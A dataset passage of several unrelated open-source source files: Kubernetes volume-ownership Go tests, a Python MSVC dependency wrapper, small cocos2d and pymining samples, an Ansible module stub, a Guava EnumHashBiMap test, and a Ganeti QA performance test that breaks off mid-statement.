t.Errorf("for %s error running setup with: %v", test.description, err)
}
mounter := &localFakeMounter{path: "FAKE_DIR_DOESNT_EXIST"} // SetVolumeOwnership() must rely on tmpDir
ownershipChanger := NewVolumeOwnership(mounter, tmpDir, &expectedGID, test.fsGroupChangePolicy, nil)
err = ownershipChanger.ChangePermissions()
if err != nil {
t.Errorf("for %s error changing ownership with: %v", test.description, err)
}
err = test.assertFunc(tmpDir)
if err != nil {
t.Errorf("for %s error verifying permissions with: %v", test.description, err)
}
})
}
}
func TestProgressTracking(t *testing.T) {
alwaysApplyPolicy := v1.FSGroupChangeAlways
var expectedGID int64 = 9999
// capture original variable
originalfilePermissionChangeFunc := filePermissionChangeFunc
originalProgressReportDuration := progressReportDuration
originalfirstEventReportDuration := firstEventReportDuration
var permissionSleepDuration = 5 * time.Millisecond
// Override how often progress is reported
progressReportDuration = 300 * time.Millisecond
// Override when first event about progress is reported
firstEventReportDuration = 150 * time.Millisecond
// Override how permission change is applied, so as to artificially slow
// permission change
filePermissionChangeFunc = func(filename string, fsGroup *int64, readonly bool, info os.FileInfo) error {
time.Sleep(permissionSleepDuration)
originalfilePermissionChangeFunc(filename, fsGroup, readonly, info)
return nil
}
t.Cleanup(func() {
filePermissionChangeFunc = originalfilePermissionChangeFunc
progressReportDuration = originalProgressReportDuration
firstEventReportDuration = originalfirstEventReportDuration
})
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: "pod1",
UID: "pod1uid",
},
Spec: v1.PodSpec{
Volumes: []v1.Volume{
{
Name: "volume-name",
VolumeSource: v1.VolumeSource{
GCEPersistentDisk: &v1.GCEPersistentDiskVolumeSource{
PDName: "fake-device1",
},
},
},
},
},
}
tests := []struct {
name string
filePermissionChangeTimeDuration time.Duration
totalWaitTime time.Duration
currentPod *v1.Pod
expectedEvents []string
}{
{
name: "When permission change finishes quickly, no events should be logged",
filePermissionChangeTimeDuration: 30 * time.Millisecond,
totalWaitTime: 1 * time.Second,
currentPod: pod,
expectedEvents: []string{},
},
{
name: "When no pod is specified, no events should be logged",
filePermissionChangeTimeDuration: 300 * time.Millisecond,
totalWaitTime: 1 * time.Second,
currentPod: nil,
expectedEvents: []string{},
},
{
name: "When permission change takes loo long and pod is specified",
filePermissionChangeTimeDuration: 600 * time.Millisecond,
totalWaitTime: 1 * time.Second,
currentPod: pod,
expectedEvents: []string{
"Warning VolumePermissionChangeInProgress Setting volume ownership for pod1uid/volumes/faketype is taking longer than expected, consider using OnRootMismatch - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/#configure-volume-permission-and-ownership-change-policy-for-pods",
"Warning VolumePermissionChangeInProgress Setting volume ownership for pod1uid/volumes/faketype, processed 1 files.",
},
},
}
for i := range tests {
tc := tests[i]
t.Run(tc.name, func(t *testing.T) {
tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
if err != nil {
t.Fatalf("error creating temp dir: %v", err)
}
podUID := "placeholder"
if tc.currentPod != nil {
podUID = string(tc.currentPod.UID)
}
volumePath := filepath.Join(tmpDir, podUID, "volumes", "faketype")
err = os.MkdirAll(volumePath, 0770)
if err != nil {
t.Fatalf("error creating volumePath %s: %v", volumePath, err)
}
defer func() {
err := os.RemoveAll(tmpDir)
if err != nil {
t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
}
}()
mounter := &localFakeMounter{path: "FAKE_DIR_DOESNT_EXIST"} // SetVolumeOwnership() must rely on tmpDir
fakeRecorder := record.NewFakeRecorder(100)
recordedEvents := []string{}
// Set how long file permission change takes
permissionSleepDuration = tc.filePermissionChangeTimeDuration
ownershipChanger := NewVolumeOwnership(mounter, volumePath, &expectedGID, &alwaysApplyPolicy, nil)
if tc.currentPod != nil {
ownershipChanger.AddProgressNotifier(tc.currentPod, fakeRecorder)
}
err = ownershipChanger.ChangePermissions()
if err != nil {
t.Errorf("unexpected error: %+v", err)
}
time.Sleep(tc.totalWaitTime)
actualEventCount := len(fakeRecorder.Events)
if len(tc.expectedEvents) == 0 && actualEventCount != len(tc.expectedEvents) {
t.Errorf("expected 0 events got %d", actualEventCount)
}
for range actualEventCount {
event := <-fakeRecorder.Events
recordedEvents = append(recordedEvents, event)
}
for i, event := range tc.expectedEvents {
if event != recordedEvents[i] {
t.Errorf("expected event %d to be %s, got: %s", i, event, recordedEvents[i])
}
}
})
}
}
// verifyDirectoryPermission checks if given path has directory permissions
// that is expected by k8s. If returns true if it does otherwise false
func verifyDirectoryPermission(path string, readonly bool) bool {
info, err := os.Lstat(path)
if err != nil {
return false
}
stat, ok := info.Sys().(*syscall.Stat_t)
if !ok || stat == nil {
return false
}
unixPerms := rwMask
if readonly {
unixPerms = roMask
}
unixPerms |= execMask
filePerm := info.Mode().Perm()
if (unixPerms&filePerm == unixPerms) && (info.Mode()&os.ModeSetgid != 0) {
return true
}
return false
}
func TestSetVolumeOwnershipOwner(t *testing.T) {
fsGroup := int64(3000)
currentUid := os.Geteuid()
if currentUid != 0 {
t.Skip("running as non-root")
}
currentGID := os.Getgid()
tests := []struct {
description string
fsGroup *int64
setupFunc func(path string) error
assertFunc func(path string) error
}{
{
description: "fsGroup=nil",
fsGroup: nil,
setupFunc: func(path string) error {
filename := filepath.Join(path, "file.txt")
file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
if err != nil {
return err
}
file.Close()
return nil
},
assertFunc: func(path string) error {
filename := filepath.Join(path, "file.txt")
if !verifyFileOwner(filename, currentUid, currentGID) {
return fmt.Errorf("invalid owner on %s", filename)
}
return nil
},
},
{
description: "*fsGroup=3000",
fsGroup: &fsGroup,
setupFunc: func(path string) error {
filename := filepath.Join(path, "file.txt")
file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
if err != nil {
return err
}
file.Close()
return nil
},
assertFunc: func(path string) error {
filename := filepath.Join(path, "file.txt")
if !verifyFileOwner(filename, currentUid, int(fsGroup)) {
return fmt.Errorf("invalid owner on %s", filename)
}
return nil
},
},
{
description: "symlink",
fsGroup: &fsGroup,
setupFunc: func(path string) error {
filename := filepath.Join(path, "file.txt")
file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0755)
if err != nil {
return err
}
file.Close()
symname := filepath.Join(path, "file_link.txt")
err = os.Symlink(filename, symname)
if err != nil {
return err
}
return nil
},
assertFunc: func(path string) error {
symname := filepath.Join(path, "file_link.txt")
if !verifyFileOwner(symname, currentUid, int(fsGroup)) {
return fmt.Errorf("invalid owner on %s", symname)
}
return nil
},
},
}
for _, test := range tests {
t.Run(test.description, func(t *testing.T) {
tmpDir, err := utiltesting.MkTmpdir("volume_linux_ownership")
if err != nil {
t.Fatalf("error creating temp dir: %v", err)
}
defer func() {
err := os.RemoveAll(tmpDir)
if err != nil {
t.Fatalf("error removing tmpDir %s: %v", tmpDir, err)
}
}()
err = test.setupFunc(tmpDir)
if err != nil {
t.Errorf("for %s error running setup with: %v", test.description, err)
}
mounter := &localFakeMounter{path: tmpDir}
always := v1.FSGroupChangeAlways
ownershipChanger := NewVolumeOwnership(mounter, tmpDir, test.fsGroup, &always, nil)
err = ownershipChanger.ChangePermissions()
if err != nil {
t.Errorf("for %s error changing ownership with: %v", test.description, err)
}
err = test.assertFunc(tmpDir)
if err != nil {
t.Errorf("for %s error verifying permissions with: %v", test.description, err)
}
})
}
}
// verifyFileOwner checks if given path is owned by uid and gid.
// It returns true if it is otherwise false.
func verifyFileOwner(path string, uid, gid int) bool {
info, err := os.Lstat(path)
if err != nil {
return false
}
stat, ok := info.Sys().(*syscall.Stat_t)
if !ok || stat == nil {
return false
}
if int(stat.Uid) != uid || int(stat.Gid) != gid {
return false
}
return true
} | go | github | https://github.com/kubernetes/kubernetes | pkg/volume/volume_linux_test.go |
#!/usr/bin/env python
#
# run msvs compiler with /showincludes and generate make dependencies
#
from optparse import OptionParser, BadOptionError
from os.path import basename, splitext
from subprocess import Popen, PIPE, STDOUT
from sys import argv
# an options parser that will pass-through unrecognized options
class PassThroughOptionParser(OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs[0]
try:
OptionParser._process_long_opt(self, rargs, values)
except BadOptionError, err:
self.largs.append(arg)
def _process_short_opts(self, rargs, values):
arg = rargs[0]
try:
OptionParser._process_short_opts(self, rargs, values)
except BadOptionError, err:
self.largs.append(arg)
# callback for dependency option, adds -showIncludes to the command
def handle_dependency_option(option, opt, value, parser):
setattr(parser.values, option.dest, True)
parser.largs.append('-showIncludes')
# callback for extracting the target from the output option (-Fo)
def handle_output_options(option, opt, value, parser):
# option parse watches for -F
# everything else is the option value
# we only need to take special action on -Fo
if value[0]=='o':
setattr(parser.values, option.dest, value[1:])
setattr(parser.values, 'depfile', '%s.d' % (splitext(value[1:])[0],))
parser.largs.append(opt + value)
parser = PassThroughOptionParser()
parser.add_option('-M',
action='callback',
callback=handle_dependency_option,
dest='dependencies',
help='write dependency file')
parser.add_option('-F',
action='callback',
callback=handle_output_options,
type='string', dest='target',
help='standard MSVC cl.exe output options')
# parse options
(options, args) = parser.parse_args()
# if not output option is specified, attempt to infer
# the target from the first non-option argument
if options.dependencies and not options.target:
firstNonOpt = filter(lambda a: a[0] not in ('-', '/'), args)[0]
options.target = '%s.obj' % (splitext(firstNonOpt)[0],)
# insert the compiler command (basename of this script)
args.insert(0, splitext(basename(argv[0]))[0])
# run the command tracking dependencies
deps = []
p = Popen(args, stdout=PIPE, stderr=STDOUT)
for line in p.stdout:
line = line.rstrip()
if line.startswith('Note: including file:'):
dep = line.split()[-1]
if dep not in deps:
deps.append(dep)
else:
print line
p.wait()
# if successful, write the dependency file
if p.returncode == 0 and options.dependencies:
f = open('%s.d' % splitext(options.target)[0], 'wt')
f.writelines([options.target, ': \\\n' ] +
[' %s \\\n' % (dep,) for dep in deps])
f.writelines(['\n\n' ] +
['%s:\n' % (dep,) for dep in deps])
f.close()
exit(p.returncode) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "s, t 1.1, s, t 2.1, s, t 3.1, s, q"
tags = "Label, color, text"
import cocos
from cocos.director import director
from cocos.sprite import Sprite
from cocos.actions import Rotate, Repeat, Delay, CallFunc
from cocos.text import Label
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.color1 = [255, 0, 0, 255]
self.color2 = [0, 0, 255, 255]
self.label = Label('', (x//2, y//2))
self.label.do( Rotate( 360, 10 ) )
self.label.do( Repeat( Delay(1) + CallFunc(self.set_color, 0) +
Delay(1) + CallFunc(self.set_color, 1) +
Delay(1) + CallFunc(self.set_color, 2)
))
self.add(self.label)
self.set_color(2)
def set_color(self, color_selector):
colors = [ (255, 32, 64, 255), (0, 240, 100, 255), (90, 90, 250, 255) ]
color = colors[color_selector]
text = "(%s, %s, %s, %s)"%color
self.label.element.text = text
self.label.element.color = color
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
"""
this is a sample shows twc-naive-bayes train and test
"""
import math
import pickle
import sys,os
sys.path.append(os.path.join(os.getcwd(), '../'))
from pymining.math.matrix import Matrix
from pymining.math.text2matrix import Text2Matrix
from pymining.nlp.segmenter import Segmenter
from pymining.common.global_info import GlobalInfo
from pymining.common.configuration import Configuration
from pymining.preprocessor.chisquare_filter import ChiSquareFilter
from pymining.classifier.twc_naive_bayes import TwcNaiveBayes
if __name__ == "__main__":
config = Configuration.FromFile("conf/test.xml")
GlobalInfo.Init(config, "__global__")
txt2mat = Text2Matrix(config, "__matrix__")
[trainx, trainy] = txt2mat.CreateTrainMatrix("data/train.txt")
chiFilter = ChiSquareFilter(config, "__filter__")
chiFilter.TrainFilter(trainx, trainy)
[trainx, trainy] = chiFilter.MatrixFilter(trainx, trainy)
nbModel = TwcNaiveBayes(config, "twc_naive_bayes")
nbModel.Train(trainx, trainy)
[testx, testy] = txt2mat.CreatePredictMatrix("data/test.txt")
[testx, testy] = chiFilter.MatrixFilter(testx, testy)
retY = nbModel.TestMatrix(testx, testy) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
from __future__ import annotations
DOCUMENTATION = """
---
module: subdir_module
short_description: A module in multiple subdirectories
description:
- A module in multiple subdirectories
author:
- Ansible Core Team
version_added: 1.0.0
options: {}
"""
EXAMPLES = """
"""
RETURN = """
"""
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
argument_spec=dict(),
)
module.exit_json()
if __name__ == '__main__':
main() | python | github | https://github.com/ansible/ansible | test/integration/targets/ansible-doc/collections/ansible_collections/testns/testcol/plugins/modules/database/database_type/subdir_module.py |
/*
* Copyright (C) 2007 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.collect.Maps.immutableEntry;
import static com.google.common.collect.ReflectionFreeAssertThrows.assertThrows;
import static com.google.common.truth.Truth.assertThat;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.J2ktIncompatible;
import com.google.common.collect.testing.SampleElements;
import com.google.common.collect.testing.features.CollectionFeature;
import com.google.common.collect.testing.features.CollectionSize;
import com.google.common.collect.testing.features.MapFeature;
import com.google.common.collect.testing.google.BiMapTestSuiteBuilder;
import com.google.common.collect.testing.google.TestBiMapGenerator;
import com.google.common.testing.NullPointerTester;
import com.google.common.testing.SerializableTester;
import java.util.Collections;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for {@code EnumHashBiMap}.
*
* @author Mike Bostock
*/
@J2ktIncompatible // EnumHashBiMap
@GwtCompatible
@NullUnmarked
public class EnumHashBiMapTest extends TestCase {
private enum Currency {
DOLLAR,
FRANC,
PESO,
POUND,
YEN
}
private enum Country {
CANADA,
CHILE,
JAPAN,
SWITZERLAND,
UK
}
@AndroidIncompatible // test-suite builders
public static final class EnumHashBiMapGenerator implements TestBiMapGenerator<Country, String> {
@SuppressWarnings("unchecked")
@Override
public BiMap<Country, String> create(Object... entries) {
BiMap<Country, String> result = EnumHashBiMap.create(Country.class);
for (Object o : entries) {
Entry<Country, String> entry = (Entry<Country, String>) o;
result.put(entry.getKey(), entry.getValue());
}
return result;
}
@Override
public SampleElements<Entry<Country, String>> samples() {
return new SampleElements<>(
immutableEntry(Country.CANADA, "DOLLAR"),
immutableEntry(Country.CHILE, "PESO"),
immutableEntry(Country.UK, "POUND"),
immutableEntry(Country.JAPAN, "YEN"),
immutableEntry(Country.SWITZERLAND, "FRANC"));
}
@SuppressWarnings("unchecked")
@Override
public Entry<Country, String>[] createArray(int length) {
return (Entry<Country, String>[]) new Entry<?, ?>[length];
}
@Override
public Iterable<Entry<Country, String>> order(List<Entry<Country, String>> insertionOrder) {
return insertionOrder;
}
@Override
public Country[] createKeyArray(int length) {
return new Country[length];
}
@Override
public String[] createValueArray(int length) {
return new String[length];
}
}
@J2ktIncompatible
@GwtIncompatible // suite
@AndroidIncompatible // test-suite builders
public static Test suite() {
TestSuite suite = new TestSuite();
suite.addTest(
BiMapTestSuiteBuilder.using(new EnumHashBiMapGenerator())
.named("EnumHashBiMap")
.withFeatures(
CollectionSize.ANY,
CollectionFeature.SERIALIZABLE,
CollectionFeature.SUPPORTS_ITERATOR_REMOVE,
MapFeature.ALLOWS_NULL_VALUES,
MapFeature.GENERAL_PURPOSE,
CollectionFeature.KNOWN_ORDER)
.createTestSuite());
suite.addTestSuite(EnumHashBiMapTest.class);
return suite;
}
public void testCreate() {
EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(Currency.class);
assertTrue(bimap.isEmpty());
assertEquals("{}", bimap.toString());
assertEquals(HashBiMap.create(), bimap);
bimap.put(Currency.DOLLAR, "dollar");
assertEquals("dollar", bimap.get(Currency.DOLLAR));
assertEquals(Currency.DOLLAR, bimap.inverse().get("dollar"));
}
public void testCreateFromMap() {
/* Test with non-empty Map. */
Map<Currency, String> map =
ImmutableMap.of(
Currency.DOLLAR, "dollar",
Currency.PESO, "peso",
Currency.FRANC, "franc");
EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(map);
assertEquals("dollar", bimap.get(Currency.DOLLAR));
assertEquals(Currency.DOLLAR, bimap.inverse().get("dollar"));
/* Map must have at least one entry if not an EnumHashBiMap. */
assertThrows(
IllegalArgumentException.class,
() -> EnumHashBiMap.create(Collections.<Currency, String>emptyMap()));
/* Map can be empty if it's an EnumHashBiMap. */
Map<Currency, String> emptyBimap = EnumHashBiMap.create(Currency.class);
bimap = EnumHashBiMap.create(emptyBimap);
assertTrue(bimap.isEmpty());
/* Map can be empty if it's an EnumBiMap. */
Map<Currency, Country> emptyBimap2 = EnumBiMap.create(Currency.class, Country.class);
EnumHashBiMap<Currency, Country> bimap2 = EnumHashBiMap.create(emptyBimap2);
assertTrue(bimap2.isEmpty());
}
public void testEnumHashBiMapConstructor() {
/* Test that it copies existing entries. */
EnumHashBiMap<Currency, String> bimap1 = EnumHashBiMap.create(Currency.class);
bimap1.put(Currency.DOLLAR, "dollar");
EnumHashBiMap<Currency, String> bimap2 = EnumHashBiMap.create(bimap1);
assertEquals("dollar", bimap2.get(Currency.DOLLAR));
assertEquals(bimap1, bimap2);
bimap2.inverse().put("franc", Currency.FRANC);
assertEquals("franc", bimap2.get(Currency.FRANC));
assertThat(bimap1.get(Currency.FRANC)).isNull();
assertFalse(bimap2.equals(bimap1));
/* Test that it can be empty. */
EnumHashBiMap<Currency, String> emptyBimap = EnumHashBiMap.create(Currency.class);
EnumHashBiMap<Currency, String> bimap3 = EnumHashBiMap.create(emptyBimap);
assertEquals(bimap3, emptyBimap);
}
public void testEnumBiMapConstructor() {
/* Test that it copies existing entries. */
EnumBiMap<Currency, Country> bimap1 = EnumBiMap.create(Currency.class, Country.class);
bimap1.put(Currency.DOLLAR, Country.SWITZERLAND);
EnumHashBiMap<Currency, Object> bimap2 = // use supertype
EnumHashBiMap.<Currency, Object>create(bimap1);
assertEquals(Country.SWITZERLAND, bimap2.get(Currency.DOLLAR));
assertEquals(bimap1, bimap2);
bimap2.inverse().put("franc", Currency.FRANC);
assertEquals("franc", bimap2.get(Currency.FRANC));
assertThat(bimap1.get(Currency.FRANC)).isNull();
assertFalse(bimap2.equals(bimap1));
/* Test that it can be empty. */
EnumBiMap<Currency, Country> emptyBimap = EnumBiMap.create(Currency.class, Country.class);
EnumHashBiMap<Currency, Country> bimap3 = // use exact type
EnumHashBiMap.create(emptyBimap);
assertEquals(bimap3, emptyBimap);
}
@GwtIncompatible // keyType
public void testKeyType() {
EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(Currency.class);
assertEquals(Currency.class, bimap.keyType());
}
public void testEntrySet() {
// Bug 3168290
Map<Currency, String> map =
ImmutableMap.of(
Currency.DOLLAR, "dollar",
Currency.PESO, "peso",
Currency.FRANC, "franc");
EnumHashBiMap<Currency, String> bimap = EnumHashBiMap.create(map);
Set<Object> uniqueEntries = Sets.newIdentityHashSet();
uniqueEntries.addAll(bimap.entrySet());
assertEquals(3, uniqueEntries.size());
}
@GwtIncompatible
@J2ktIncompatible
public void testSerializable() {
SerializableTester.reserializeAndAssert(EnumHashBiMap.create(Currency.class));
}
@J2ktIncompatible
@GwtIncompatible // reflection
public void testNulls() {
new NullPointerTester().testAllPublicStaticMethods(EnumHashBiMap.class);
new NullPointerTester().testAllPublicInstanceMethods(EnumHashBiMap.create(Currency.class));
}
} | java | github | https://github.com/google/guava | android/guava-tests/test/com/google/common/collect/EnumHashBiMapTest.java |
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Performance testing QA tests.
"""
import datetime
import functools
import itertools
import threading
import time
from ganeti import constants
from qa import qa_config
from qa import qa_error
from qa_instance_utils import GetGenericAddParameters
from qa import qa_job_utils
from qa import qa_logging
from qa import qa_utils
MAX_JOB_SUBMISSION_DURATION = 15.0
class _JobQueueDriver(object):
"""This class handles polling of jobs and reacting on status changes.
Jobs are added via the L{AddJob} method, and can have callback functions
assigned to them. Those are called as soon as the job enters the appropriate
state. Callback functions can add new jobs to the driver as needed.
A call to L{WaitForCompletion} finally polls Ganeti until all jobs have
succeeded.
"""
_UNKNOWN_STATUS = "unknown"
class _JobEntry(object):
"""Internal class representing a job entry.
"""
def __init__(self, job_id, running_fn, success_fn):
self.job_id = job_id
self.running_fn = running_fn
self.success_fn = success_fn
def __str__(self):
return str(self.job_id)
def __init__(self):
self._jobs = {}
self._running_notified = set()
self._jobs_per_status = {}
self._lock = threading.RLock()
def AddJob(self, job_id, running_fn=None, success_fn=None):
"""Add a job to the driver.
@type job_id: of ints
@param job_id: job id to add to the driver
@type running_fn: function taking a L{_JobQueueDriver} and an int
@param running_fn: function called once when a job changes to running state
(or success state, if the running state was too short)
@type success_fn: function taking a L{_JobQueueDriver} and an int
@param success_fn: function called for each successful job id
"""
with self._lock:
self._jobs[job_id] = _JobQueueDriver._JobEntry(job_id,
running_fn,
success_fn)
# the status will be updated on the next call to _FetchJobStatuses
self._jobs_per_status.setdefault(self._UNKNOWN_STATUS, []).append(job_id)
def _FetchJobStatuses(self):
"""Retrieves status information of the given jobs.
"""
job_statuses = qa_job_utils.GetJobStatuses(self._GetJobIds())
new_statuses = {}
for job_id, status in job_statuses.items():
new_statuses.setdefault(status, []).append(self._jobs[int(job_id)])
self._jobs_per_status = new_statuses
def _GetJobIds(self):
return list(self._jobs)
def _GetJobsInStatuses(self, statuses):
"""Returns a list of L{_JobEntry} of all jobs in the given statuses.
@type statuses: iterable of strings
@param statuses: jobs in those statuses are returned
@rtype: list of L{_JobEntry}
@return: list of job entries in the requested statuses
"""
ret = []
for state in statuses:
ret.extend(self._jobs_per_status.get(state, []))
return ret
def _UpdateJobStatuses(self):
"""Retrieves job statuses from the cluster and updates internal state.
"""
self._FetchJobStatuses()
error_jobs = self._GetJobsInStatuses([constants.JOB_STATUS_ERROR])
if error_jobs:
raise qa_error.Error(
"Jobs %s are in error state!" % [job.job_id for job in error_jobs])
for job in self._GetJobsInStatuses([constants.JOB_STATUS_RUNNING,
constants.JOB_STATUS_SUCCESS]):
if job.job_id not in self._running_notified:
if job.running_fn is not None:
job.running_fn(self, job.job_id)
self._running_notified.add(job.job_id)
for job in self._GetJobsInStatuses([constants.JOB_STATUS_SUCCESS]):
if job.success_fn is not None:
job.success_fn(self, job.job_id)
# we're done with this job
del self._jobs[job.job_id]
def _HasPendingJobs(self):
"""Checks if there are still jobs pending.
@rtype: bool
@return: C{True} if there are still jobs which have not succeeded
"""
with self._lock:
self._UpdateJobStatuses()
uncompleted_jobs = self._GetJobsInStatuses(
constants.JOB_STATUS_ALL - constants.JOBS_FINALIZED)
unknown_jobs = self._GetJobsInStatuses([self._UNKNOWN_STATUS])
return len(uncompleted_jobs) > 0 or len(unknown_jobs) > 0
def WaitForCompletion(self):
"""Wait for the completion of all registered jobs.
"""
while self._HasPendingJobs():
time.sleep(2)
with self._lock:
if self._jobs:
raise qa_error.Error(
"Jobs %s didn't finish in success state!" % self._GetJobIds())
def _AcquireAllInstances():
"""Generator for acquiring all instances in the QA config.
"""
try:
while True:
instance = qa_config.AcquireInstance()
yield instance
except qa_error.OutOfInstancesError:
pass
def _AcquireAllNodes():
"""Generator for acquiring all nodes in the QA config.
"""
exclude = []
try:
while True:
node = qa_config.AcquireNode(exclude=exclude)
exclude.append(node)
yield node
except qa_error.OutOfNodesError:
pass
def _ExecuteJobSubmittingCmd(cmd):
"""Executes a job submitting command and returns the resulting job ID.
This will fail if submitting the job takes longer than
L{MAX_JOB_SUBMISSION_DURATION}.
@type cmd: list of string or string
@param cmd: the job producing command to execute on the cluster
@rtype: int
@return: job-id
"""
start = datetime.datetime.now()
result = qa_job_utils.ExecuteJobProducingCommand(cmd)
duration = qa_utils.TimedeltaToTotalSeconds(datetime.datetime.now() - start)
if duration > MAX_JOB_SUBMISSION_DURATION:
print(qa_logging.FormatWarning(
"Executing '%s' took %f seconds, a maximum of %f was expected" %
(cmd, duration, MAX_JOB_SUBMISSION_DURATION)))
return result
def _SubmitInstanceCreationJob(instance, disk_template=None):
"""Submit an instance creation job.
@type instance: L{qa_config._QaInstance}
@param instance: instance to submit a create command for
@type disk_template: string
@param disk_template: disk template for the new instance or C{None} which
causes the default disk template to be used
@rtype: int
@return: job id of the submitted creation job
"""
if disk_template is None:
disk_template = qa_config.GetDefaultDiskTemplate()
try:
cmd = (["gnt-instance", "add", "--submit", "--opportunistic-locking",
"--os-type=%s" % qa_config.get("os"),
"--disk-template=%s" % disk_template] +
GetGenericAddParameters(instance, disk_template))
cmd.append(instance.name)
instance.SetDiskTemplate(disk_template)
return _ExecuteJobSubmittingCmd(cmd)
except:
instance.Release()
raise
def _SubmitInstanceRemoveJob(instance):
"""Submit an instance remove job.
@type instance: L{qa_config._QaInstance}
@param instance: the instance to remove
@rtype: int
@return: job id of the submitted remove job
"""
try:
cmd = (["gnt-instance", "remove", "--submit", "-f"])
cmd.append(instance.name)
return _ExecuteJobSubmittingCmd(cmd)
finally:
instance.Release()
def _TestParallelInstanceCreationAndRemoval(max_instances=None,
disk_template=None,
custom_job_driver=None):
"""Tests parallel creation and immediate removal of instances.
@type max_instances: int
@param max_instances: maximum number of instances to create
@type disk_template: string
@param disk_template: disk template for the new instances or C{None} which
causes the default disk template to be used
@type custom_job_driver: _JobQueueDriver
@param custom_job_driver: a custom L{_JobQueueDriver} to use if not L{None}.
If one is specified, C{WaitForCompletion} is _not_
called on it.
"""
job_driver = custom_job_driver or _JobQueueDriver()
def _CreateSuccessFn(instance, job_driver, _):
job_id = _SubmitInstanceRemoveJob(instance)
job_driver.AddJob(job_id)
instance_generator = _AcquireAllInstances()
if max_instances is not None:
instance_generator = itertools.islice(instance_generator, max_instances)
for instance in instance_generator:
job_id = _SubmitInstanceCreationJob(instance, disk_template=disk_template)
job_driver.AddJob(
job_id, success_fn=functools.partial(_CreateSuccessFn, instance))
if custom_job_driver is None:
job_driver.WaitForCompletion()
def TestParallelMaxInstanceCreationPerformance():
"""PERFORMANCE: Parallel instance creation (instance count = max).
"""
_TestParallelInstanceCreationAndRemoval()
def TestParallelNodeCountInstanceCreationPerformance():
"""PERFORMANCE: Parallel instance creation (instance count = node count).
"""
nodes = list(_AcquireAllNodes())
_TestParallelInstanceCreationAndRemoval(max_instances=len(nodes))
qa_config.ReleaseManyNodes(nodes)
def CreateAllInstances():
"""Create all instances configured in QA config in the cluster.
@rtype: list of L{qa_config._QaInstance}
@return: list of instances created in the cluster
"""
job_driver = _JobQueueDriver()
instances = list(_AcquireAllInstances())
for instance in instances:
job_id = _SubmitInstanceCreationJob(instance)
job_driver.AddJob(job_id)
job_driver.WaitForCompletion()
return instances
def RemoveAllInstances(instances):
"""Removes all given instances from the cluster.
@type instances: list of L{qa_config._QaInstance}
@param instances:
"""
job_driver = _JobQueueDriver()
for instance in instances:
job_id = _SubmitInstanceRemoveJob(instance)
job_driver.AddJob(job_id)
job_driver.WaitForCompletion()
def TestParallelModify(instances):
"""PERFORMANCE: Parallel instance modify.
@type instances: list of L{qa_config._QaInstance}
@param instances: list of instances to issue modify commands against
"""
job_driver = _JobQueueDriver()
# set min mem to same value as max mem
new_min_mem = qa_config.get(constants.BE_MAXMEM)
for instance in instances:
cmd = (["gnt-instance", "modify", "--submit",
"-B", "%s=%s" % (constants.BE_MINMEM, new_min_mem)])
cmd.append(instance.name)
job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
cmd = (["gnt-instance", "modify", "--submit",
"-O", "fake_os_param=fake_value"])
cmd.append(instance.name)
job_driver.AddJob(_ExecuteJobSubmittingCmd(cmd))
cmd = (["gnt-instance", "modify", "--submit",
"-O", "fake_os_param=fake_value",
